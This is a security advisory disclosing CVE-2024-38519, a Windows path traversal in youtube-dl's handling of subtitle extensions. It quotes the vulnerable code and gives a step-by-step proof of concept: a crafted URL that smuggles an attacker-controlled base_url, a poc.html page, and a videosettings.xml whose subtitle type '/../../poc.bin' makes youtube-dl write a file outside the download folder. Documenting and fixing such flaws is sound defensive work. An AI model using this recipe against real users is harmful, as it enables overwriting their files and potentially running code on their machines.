Coordinated Disclosure Timeline
- 2024-05-24: The report was sent to the maintainer.
- 2024-07-03: v2024.07.03 with the fix was released.
- 2024-07-03: The advisory was published.
Summary
youtube-dl doesn’t validate the subtitle extension name, which makes its Windows users vulnerable to path traversal and allows for arbitrary binary file overwrite when downloading a video with subtitles from a crafted link.
Project
youtube-dl
Tested Version
The nightly v2024.05.16 and the last official v2021.12.17.
Details
Path traversal saving subtitles (GHSL-2024-089)
youtube-dl is capable of downloading not only video files, but also accompanying subtitles if the user specifies the --write-sub, --write-auto-sub, or --all-subs option. Each supported video website has a dedicated extractor. Some extractors provide only the URLs of subtitles, and youtube-dl resolves their extension from the URL path. Others provide both the URLs and the subtitle extensions explicitly. Of the latter, some validate the extracted subtitle extension, but others trust the extracted value blindly. youtube-dl honors the provided extension name and uses it to build the name of the output file for subtitles in [1]. There, filename is the generated name for the video file, sub_lang is en by default, sub_format is the extracted subtitle extension, and info_dict.get('ext') contains the video file extension that subtitles_filename replaces with sub_lang and sub_format. The subtitle is written as a binary file in [2]. encodeFilename is just a wrapper for Unicode support that does nothing in Python 3.
If the user doesn’t override the default output file template %(title)s-%(id)s.%(ext)s, then sub_filename is formatted as %(title)s-%(id)s.%(sub_lang)s.%(sub_format)s. The path traversal injection in sub_format doesn’t work on Linux, because Linux resolves every path component and rejects paths like not_existing_folder/../../file whose first component does not exist. It does work on Windows, which collapses the .. segments before accessing the file system.
if subtitles_are_requested and info_dict.get('requested_subtitles'):
    # subtitles download errors are already managed as troubles in relevant IE
    # that way it will silently go on when used with unsupporting IE
    subtitles = info_dict['requested_subtitles']
    ie = self.get_info_extractor(info_dict['extractor_key'])
    for sub_lang, sub_info in subtitles.items():
        sub_format = sub_info['ext']
        sub_filename = subtitles_filename(filename, sub_lang, sub_format, info_dict.get('ext'))  # <------------- [1]
        if self.params.get('nooverwrites', False) and os.path.exists(encodeFilename(sub_filename)):
            self.to_screen('[info] Video subtitle %s.%s is already present' % (sub_lang, sub_format))
        else:
            self.to_screen('[info] Writing video subtitles to: ' + sub_filename)
            if sub_info.get('data') is not None:
                # ...
            else:
                try:
                    sub_data = ie._request_webpage(
                        sub_info['url'], info_dict['id'], note=False).read()
                    with open(encodeFilename(sub_filename), 'wb') as subfile:  # <------------- [2]
                        subfile.write(sub_data)
                except (ExtractorError, IOError, OSError, ValueError) as err:
                    self.report_warning('Unable to download subtitle for "%s": %s' %
                                        (sub_lang, error_to_compat_str(err)))
                    continue
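The details above note that some extractors validate the extracted subtitle extension while others trust it blindly. As a rough illustration of what such a check could look like, here is a minimal sketch. The function name is_safe_subtitle_ext and the allow-list are hypothetical and are not taken from youtube-dl; the fix shipped by the project may work differently.

```python
import re

# Hypothetical allow-list; a real project would choose its own set of formats.
KNOWN_SUBTITLE_EXTS = {"srt", "vtt", "ass", "ttml", "json"}

# An extension is expected to be a short alphanumeric token: no dots,
# slashes, backslashes, colons or any other path syntax.
_EXT_TOKEN = re.compile(r"[A-Za-z0-9]{1,10}")


def is_safe_subtitle_ext(ext):
    """Return True only for a plain, known subtitle extension."""
    if not isinstance(ext, str):
        return False
    if _EXT_TOKEN.fullmatch(ext) is None:
        return False
    return ext.lower() in KNOWN_SUBTITLE_EXTS


# Print the verdict for a few benign and malicious candidates.
for candidate in ("vtt", "SRT", "/../../poc.bin", "..\\poc.bin", ""):
    print(repr(candidate), is_safe_subtitle_ext(candidate))
```

A check of this kind would have to run before the extension reaches the code that builds sub_filename, so that a value such as /../../poc.bin is rejected instead of being concatenated into a path.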
Exploitability and Proof of Concept (PoC)
Intentionally crafted subtitle extension names on a supported website (such as youtube.com or bbc.co.uk) are outside the threat model of this report. However, such a website may be compromised at some point: an XSS or SQL injection would allow an attacker to exploit a specific youtube-dl extractor. The attacker would then need to wait for any youtube-dl user, or trick a specific one, to download the video with subtitles. Other youtube-dl features, however, allow exploitation without compromising the video hosting website:
- URL smuggling. Some youtube-dl extractors attempt to get additional information from the part of the URL that comes after #, the fragment. The fragment is URL decoded and parsed as JSON. The extractor for Microsoft Virtual Academy, for example, parses the fragment [1], retrieves base_url from it [2], and then downloads an XML file from that URL [3]. The subtitle extension is extracted from the XML file. If a user is tricked into running, for example,
  youtube-dl --write-sub https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D
  it will use an XML file from an attacker-controlled site, site.com in this case, to extract subtitles and video files.
  url, smuggled_data = unsmuggle_url(url, {})  # <------------- [1]
  mobj = re.match(self._VALID_URL, url)
  course_id = mobj.group('course_id')
  video_id = mobj.group('id')
  base_url = smuggled_data.get('base_url') or self._extract_base_url(course_id, video_id)  # <------------- [2]
  settings = self._download_xml(
      '%s/content/content_%s/videosettings.xml?v=1' % (base_url, video_id),  # <------------- [3]
      video_id, 'Downloading video settings XML')
- Generic extractor. youtube-dl allows you to download videos from arbitrary pages that embed supported video websites. This allows the attacker to hide the smuggled fragment from a youtube-dl user. The user only needs to run
  youtube-dl --write-sub https://attacker.com/poc.html
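To make the URL smuggling item above more concrete, the following sketch decodes the fragment of the crafted Microsoft Virtual Academy URL in the way the text describes: URL-decode the fragment, then parse it as JSON. The helper decode_smuggled_fragment is a hypothetical name written for this illustration using only the Python standard library; it is not youtube-dl's unsmuggle_url and may differ from it in details.

```python
import json
from urllib.parse import parse_qs, urlsplit

SMUGGLE_KEY = "__youtubedl_smuggle"  # key name as it appears in the crafted URL


def decode_smuggled_fragment(url):
    """Return (url_without_fragment, smuggled_dict) for a crafted URL.

    Illustrative only: mirrors the described behaviour, not youtube-dl's code.
    """
    parts = urlsplit(url)
    fields = parse_qs(parts.fragment)  # URL-decodes the fragment
    if SMUGGLE_KEY not in fields:
        return url, {}
    data = json.loads(fields[SMUGGLE_KEY][0])  # the value is a JSON document
    return parts._replace(fragment="").geturl(), data


crafted = (
    "https://mva.microsoft.com/en-US/training-courses/"
    "microsoft-azure-fundamentals-virtual-machines-11788"
    "?l=gfVXISmEB_6804984382"
    "#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2Fsite.com%22%7D"
)
clean_url, smuggled = decode_smuggled_fragment(crafted)
print(clean_url)
print(smuggled)
```

The decoded dictionary carries the attacker-chosen base_url, which is the value the extractor then prefers over the one it would otherwise derive itself.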
For a PoC:
- Create a folder with the following poc.html:
<class="embedly-card" href="https://mva.microsoft.com/en-US/training-courses/microsoft-azure-fundamentals-virtual-machines-11788?l=gfVXISmEB_6804984382#__youtubedl_smuggle=%7B%22base_url%22%3A+%22http%3A%2F%2F127.0.0.1%3A8000%22%7D">
- Create two nested subfolders, content/content_gfVXISmEB_6804984382, in the folder where poc.html resides.
- Create the following videosettings.xml in the content_gfVXISmEB_6804984382 folder:
<videoSettings version="1.5">
<PlaylistItems>
<PlaylistItem>
<MediaSources videoType="progressive"><MediaSource videoMode="720p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="true">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_high.mp4</MediaSource><MediaSource videoMode="540p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">http://video.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01_mid.mp4</MediaSource><MediaSource videoMode="360p" mimeType="video/mp4" codec="avc1.42E01E,mp4a.40.2" default="false">https://sec.ch9.ms/ch9/1089/193d8990-f065-432e-87d7-981c61e41089/636AzureFundamentalsVM01.mp4</MediaSource></MediaSources>
<MediaSource />
<Title>01 | Introduction</Title>
<MarkerResourceSource type="/../../poc.bin">content/content_gfvxismeb_6804984382/subtitles</MarkerResourceSource>
<ThumbSource />
</PlaylistItem>
</PlaylistItems>
</videoSettings>
- Create an arbitrary file named subtitles in the content_gfVXISmEB_6804984382 folder.
- Host the folder containing poc.html with python3 -m http.server
- On Windows, run youtube-dl --write-sub http://127.0.0.1:8000/poc.html
youtube-dl creates a file poc.bin one level up from the current folder, as long as the running user has sufficient permissions.
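The reason poc.bin lands one level up can be followed with a small sketch. It assumes a made-up download folder and video file name, and uses a hypothetical build_sub_filename helper that imitates the naming scheme described in the details section rather than calling youtube-dl itself. ntpath.normpath is used only to approximate how Windows collapses .. segments lexically.

```python
import ntpath

# Made-up values for illustration; only the sub_format comes from the PoC.
download_dir = "C:\\Users\\victim\\Downloads"
video_filename = "video-123.mp4"
sub_format = "/../../poc.bin"  # the type attribute from videosettings.xml


def build_sub_filename(video_filename, sub_lang, sub_format):
    """Hypothetical stand-in for the naming scheme: <stem>.<lang>.<format>."""
    stem, _video_ext = ntpath.splitext(video_filename)
    return "%s.%s.%s" % (stem, sub_lang, sub_format)


sub_filename = build_sub_filename(video_filename, "en", sub_format)

# The first ".." cancels the bogus "video-123.en." component, the second
# one steps out of the download folder itself.
resolved = ntpath.normpath(ntpath.join(download_dir, sub_filename))

print(sub_filename)
print(resolved)
```

Because the first .. only cancels the nonexistent component created by the file name prefix, every additional ../ in the extension moves the target one directory further up.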
Impact
This issue may lead to unauthorized file system modification and, if an executable file is overwritten, to remote code execution.
CVE
- CVE-2024-38519
Credit
This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).
Contact
You can contact the GHSL team at securitylab@github.com. Please include a reference to GHSL-2024-089 in any communication regarding this issue.